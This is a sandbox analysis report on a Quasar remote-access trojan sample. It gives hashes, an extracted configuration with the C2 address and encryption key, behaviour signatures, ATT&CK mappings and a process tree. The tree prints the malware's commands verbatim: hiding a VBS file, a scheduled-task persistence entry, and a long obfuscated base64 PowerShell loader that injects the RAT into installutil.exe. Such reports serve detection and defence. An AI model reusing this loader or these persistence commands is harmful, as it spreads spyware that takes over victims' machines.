quasar | 7625087fb31f735d1570fd75dc299ed7bcaa7d7abb20304a1c54a201b327695a

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-11-2024 13:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sender_Leaked.exe
Size

10.4MB
MD5

ec24824b426d96f1137c664f23309a97
SHA1

0eb8f4d89dc4ac3824d0ce3a4d872c2ab0d52b38
SHA256

bd129bf2a26437a068b7486b46ca77d6f45786ac9f400c94678c0fdd15759a42
SHA512

14a2701c7551232da3c1d5d9cb18cf76f6aed52e046b6fd5aed9fd65bfa9058090a95331265f550d677b1c9947194f4b2e035ee2a8c9d7faa7d4b109e6c15738
SSDEEP

196608:XHdqeGkP/DnwZsupqDA1jV19v7+dPB68K1T59Y8pC/Uhh6ipc+46h:NFrn8sOqkFV1B+JB6F59bpP7xc+ph

Score

10^/10

quasar office defense_evasion discovery execution spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

45.200.149.95:6669

Mutex

6HcAGCOypVIi6hl6rR

Attributes

encryption_key
3Fmq36RtzQkpmjAWxAFM
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
DISC
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/756-193-0x0000000000400000-0x000000000044E000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
20	448	powershell.exe

Loads dropped DLL 20 IoCs

Processes:

sender_Leaked.exe

pid	Process
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe
2004	sender_Leaked.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2436	powershell.exe
448	powershell.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
14	ifconfig.me
15	ifconfig.me
22	ip-api.com

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Processes:

cmd.exe

pid	Process
3408	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description	pid	Process	procid_target
PID 448 set thread context of 756	448	powershell.exe	107

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023caf-83.dat	upx
behavioral2/memory/2004-87-0x00007FF98B9F0000-0x00007FF98BE32000-memory.dmp	upx
behavioral2/files/0x0007000000023c75-89.dat	upx
behavioral2/memory/2004-97-0x00007FF99B240000-0x00007FF99B24F000-memory.dmp	upx
behavioral2/files/0x0007000000023c78-100.dat	upx
behavioral2/memory/2004-103-0x00007FF995BC0000-0x00007FF995C04000-memory.dmp	upx
behavioral2/files/0x0007000000023cb2-107.dat	upx
behavioral2/files/0x0007000000023caa-111.dat	upx
behavioral2/files/0x0007000000023cac-114.dat	upx
behavioral2/files/0x0007000000023c7a-122.dat	upx
behavioral2/memory/2004-133-0x00007FF99AE50000-0x00007FF99AE60000-memory.dmp	upx
behavioral2/memory/2004-132-0x00007FF98BF10000-0x00007FF98BFE6000-memory.dmp	upx
behavioral2/memory/2004-131-0x00007FF99B1E0000-0x00007FF99B1ED000-memory.dmp	upx
behavioral2/files/0x0007000000023c77-130.dat	upx
behavioral2/memory/2004-129-0x00007FF98B9F0000-0x00007FF98BE32000-memory.dmp	upx
behavioral2/files/0x0007000000023c72-125.dat	upx
behavioral2/memory/2004-121-0x00007FF98B3D0000-0x00007FF98B739000-memory.dmp	upx
behavioral2/memory/2004-119-0x00007FF98BFF0000-0x00007FF98C0A5000-memory.dmp	upx
behavioral2/memory/2004-112-0x00007FF996980000-0x00007FF9969A6000-memory.dmp	upx
behavioral2/files/0x0007000000023c7c-110.dat	upx
behavioral2/memory/2004-109-0x00007FF99B1F0000-0x00007FF99B1FD000-memory.dmp	upx
behavioral2/memory/2004-106-0x00007FF99B0A0000-0x00007FF99B0B9000-memory.dmp	upx
behavioral2/files/0x0007000000023c7b-104.dat	upx
behavioral2/memory/2004-99-0x00007FF99B220000-0x00007FF99B23B000-memory.dmp	upx
behavioral2/files/0x0007000000023c73-98.dat	upx
behavioral2/memory/2004-96-0x00007FF99BCC0000-0x00007FF99BCE4000-memory.dmp	upx
behavioral2/files/0x0007000000023cab-94.dat	upx
behavioral2/files/0x0007000000023c76-134.dat	upx
behavioral2/memory/2004-137-0x00007FF98CC10000-0x00007FF98CC57000-memory.dmp	upx
behavioral2/files/0x0007000000023cb4-136.dat	upx
behavioral2/memory/2004-139-0x00007FF98ACF0000-0x00007FF98AE02000-memory.dmp	upx
behavioral2/memory/2004-143-0x00007FF99B0A0000-0x00007FF99B0B9000-memory.dmp	upx
behavioral2/memory/2004-178-0x00007FF996980000-0x00007FF9969A6000-memory.dmp	upx
behavioral2/memory/2004-192-0x00007FF98BFF0000-0x00007FF98C0A5000-memory.dmp	upx
behavioral2/memory/2004-196-0x00007FF98B3D0000-0x00007FF98B739000-memory.dmp	upx
behavioral2/memory/2004-207-0x00007FF995BC0000-0x00007FF995C04000-memory.dmp	upx
behavioral2/memory/2004-206-0x00007FF99B220000-0x00007FF99B23B000-memory.dmp	upx
behavioral2/memory/2004-203-0x00007FF98B9F0000-0x00007FF98BE32000-memory.dmp	upx
behavioral2/memory/2004-204-0x00007FF99BCC0000-0x00007FF99BCE4000-memory.dmp	upx

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
2072	448	WerFault.exe	99

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exeinstallutil.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installutil.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
3696	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2436	powershell.exe
2436	powershell.exe
2436	powershell.exe
448	powershell.exe
448	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeinstallutil.exe

description	pid	Process
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	756	installutil.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

installutil.exe

pid	Process
756	installutil.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

sender_Leaked.exesender_Leaked.execmd.execmd.execmd.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 4500 wrote to memory of 2004	4500	sender_Leaked.exe	84
PID 4500 wrote to memory of 2004	4500	sender_Leaked.exe	84
PID 2004 wrote to memory of 4052	2004	sender_Leaked.exe	88
PID 2004 wrote to memory of 4052	2004	sender_Leaked.exe	88
PID 2004 wrote to memory of 3408	2004	sender_Leaked.exe	89
PID 2004 wrote to memory of 3408	2004	sender_Leaked.exe	89
PID 3408 wrote to memory of 368	3408	cmd.exe	90
PID 3408 wrote to memory of 368	3408	cmd.exe	90
PID 2004 wrote to memory of 1136	2004	sender_Leaked.exe	91
PID 2004 wrote to memory of 1136	2004	sender_Leaked.exe	91
PID 1136 wrote to memory of 3696	1136	cmd.exe	92
PID 1136 wrote to memory of 3696	1136	cmd.exe	92
PID 2004 wrote to memory of 4736	2004	sender_Leaked.exe	95
PID 2004 wrote to memory of 4736	2004	sender_Leaked.exe	95
PID 2004 wrote to memory of 3716	2004	sender_Leaked.exe	96
PID 2004 wrote to memory of 3716	2004	sender_Leaked.exe	96
PID 4736 wrote to memory of 3076	4736	cmd.exe	97
PID 4736 wrote to memory of 3076	4736	cmd.exe	97
PID 4736 wrote to memory of 2436	4736	cmd.exe	98
PID 4736 wrote to memory of 2436	4736	cmd.exe	98
PID 3716 wrote to memory of 448	3716	cmd.exe	99
PID 3716 wrote to memory of 448	3716	cmd.exe	99
PID 3716 wrote to memory of 448	3716	cmd.exe	99
PID 448 wrote to memory of 2900	448	powershell.exe	104
PID 448 wrote to memory of 2900	448	powershell.exe	104
PID 448 wrote to memory of 2900	448	powershell.exe	104
PID 2900 wrote to memory of 3520	2900	csc.exe	105
PID 2900 wrote to memory of 3520	2900	csc.exe	105
PID 2900 wrote to memory of 3520	2900	csc.exe	105
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107
PID 448 wrote to memory of 756	448	powershell.exe	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
368	attrib.exe

C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe
"C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4500
- C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe
  "C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3408
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"
      4⤵
      Views/modifies file attributes
      PID:368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1136
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\system32\cmd.exe
      cmd /C echo Y
      4⤵
      PID:3076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:448
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o534rzqz\o534rzqz.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2900
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB074.tmp" "c:\Users\Admin\AppData\Local\Temp\o534rzqz\CSCFEE0349545DB41A3AA854EE895887E1F.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3520
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:756
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 2556
        5⤵
        Program crash
        
        PID:2072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 448 -ip 448
1⤵
PID:4208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB074.tmp

Filesize
1KB

MD5
0553e1d2811a96ae40b57f8d4de4a6a7

SHA1
6b1cf41021d3d2a3d9c49b13bd763d55b7b65294

SHA256
1989c127774ea3cf01d79168dc5a00a25541efb5d990006eb42b39cc93a260df

SHA512
7b3671d25e87c8bd65090a8f5ee60b90763a79a5c38eeb7f84c7146a66bc4f9de665b78e08e9d17af4d4933dc2f36dbd821573e4c47b1332885e7bdad3d39fca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\MSVCP140.dll

Filesize
612KB

MD5
ba72c2f6f465926980adc2fb7f8b3490

SHA1
63de0e3c14d0f45c1edab1c3ecd4adfb78ee8cdd

SHA256
86881a7054532019291c162f0a8177980c1c2b45490f7e88543f22915d08d9ff

SHA512
05136a8dde4359efd112341b12e0545accc8d018e4fa7495b071197833a0227bd50879d7753b61582505b8e2286f845604008bd2020e689e148037a9ef7d7474

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\VCRUNTIME140.dll

Filesize
87KB

MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_brotli.cp38-win_amd64.pyd

Filesize
272KB

MD5
1ed41b26e3675333e0d29b032c032655

SHA1
0cc93e4243a93e8b57e90a8ba57b6494e158d889

SHA256
cea46020761f6fc2a0ca404c9f503bc8c415389568374bb4e5ba4efae89c69a2

SHA512
0a9394294a3b26958618d3a90a4af960bee39cc9a193f3bed8d4da7b6e698126e4f07b817f55f880ef7534e3871b0cb89fb3a4cc3e8177d16cfdeb9806825a68

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_bz2.pyd

Filesize
45KB

MD5
71c208605d9d1a1b822ed14e40bde272

SHA1
d605b1891c2b9360344f878f7aeae90a95e1425b

SHA256
23330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c

